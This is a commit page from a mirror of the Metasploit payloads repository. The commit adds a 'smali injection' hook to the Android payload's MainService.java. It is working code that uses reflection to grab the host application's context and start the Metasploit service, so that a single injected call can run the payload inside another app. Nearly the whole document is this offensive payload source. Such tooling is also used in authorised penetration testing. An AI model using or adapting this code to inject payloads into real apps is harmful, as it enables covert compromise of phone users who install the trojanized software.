github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-18 15:14:10 +01:00
Code Releases Activity

add a simpler smali injection function

Browse Source
This commit is contained in:
Tim 2017-01-19 14:45:10 +07:00
parent a35889aff5
commit 80e8083e23
No known key found for this signature in database
GPG Key ID: 62361A8B17EEED19
1 changed files with 52 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

53
java/androidpayload/app/src/com/metasploit/stage/MainService.java
View File

@ -1,13 +1,64 @@
package com.metasploit.stage; package com.metasploit.stage;
import android.app.ActivityManager;
import android.app.Service; import android.app.Service;
import android.content.Context; import android.content.Context;
import android.content.Intent; import android.content.Intent;
import android.os.Handler;
import android.os.IBinder; import android.os.IBinder;
import android.os.Looper;
import java.lang.reflect.Method;
public class MainService extends Service { public class MainService extends Service {
private static final Object contextWaiter = new Object();
private static Context context;
private static void findContext() throws Exception {
Class<?> activityThreadClass;
try {
activityThreadClass = Class.forName("android.app.ActivityThread");
} catch (ClassNotFoundException e) {
// No context
return;
}
final Method currentApplication = activityThreadClass.getMethod("currentApplication");
context = (Context) currentApplication.invoke(null, (Object[]) null);
if (context == null) {
// Post to the UI/Main thread and try and retrieve the Context
final Handler handler = new Handler(Looper.getMainLooper());
handler.post(new Runnable() {
public void run() {
synchronized (contextWaiter) {
try {
context = (Context) currentApplication.invoke(null, (Object[]) null);
} catch (Exception e) {
e.printStackTrace();
}
contextWaiter.notify();
}
}
});
synchronized (contextWaiter) {
if (context == null) {
contextWaiter.wait(100);
}
}
}
}
// Smali hook point
public static void start() {
try {
findContext();
} catch (Exception e) {
}
if (context != null) {
startService(context);
}
}
public static void startService(Context context) { public static void startService(Context context) {
context.startService(new Intent(context, MainService.class)); context.startService(new Intent(context, MainService.class));
} }